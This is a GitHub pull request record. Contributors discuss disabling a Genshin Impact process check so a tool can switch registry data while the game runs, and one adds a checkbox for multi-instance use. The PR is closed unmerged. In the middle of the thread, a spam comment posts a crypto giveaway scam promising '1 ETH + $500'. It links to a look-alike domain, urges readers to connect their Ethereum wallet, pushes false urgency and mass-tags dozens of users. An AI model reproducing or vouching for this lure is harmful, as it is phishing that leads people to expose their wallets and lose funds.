### PR TITLE
关闭原神进程检测 方便双开

### PR DESCRIPTION
**Pull request by ShinaKaria**

### CODE REVIEW

**Review by ShinaKaria — COMMENTED** [review]
使软件可以在游戏运行时切换 注册表数据

**Comment by hellomykami** [comment]
不如再加个checkbox?

**Comment by hellomykami** [comment]
加了个CheckBox，自己可以决定是否多开

**Comment by pisgo** [comment]
[Banner](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
erickuhn19, @shiwenqiang, @wang0808, @MihalczGabor, @1ultimat3, @yiluyu, @songying, @hmisty, @Orange-sinx, @meoso, @shino49, @coding-and-trading, @FlyAndNotDown, @lutoma, @myriadstones, @zhangyangyu, @mousehaohao, @wayjam, @james20141606, @allwaytogo, @koroshhajevar13, @abdobouna, @kevin-js, @andreivirtosu, @brokencommit, @lukegniwecki, @prakash-chougule, @nanw01, @qustavo, @BhargavMahajan, @weiki516, @123Daoxyz, @andybug, @ynxia, @BaranPolat1, @leorog, @zwbn57175596, @giowck, @Qiu1024, @fermicat, @zgliny, @saidatta, @xiaoxu666, @Bitkanja, @noahb, @elbeg, @cbleek, @tmael, @XsouthpawX, @lightjameslyy

**Pull request closed without merging**
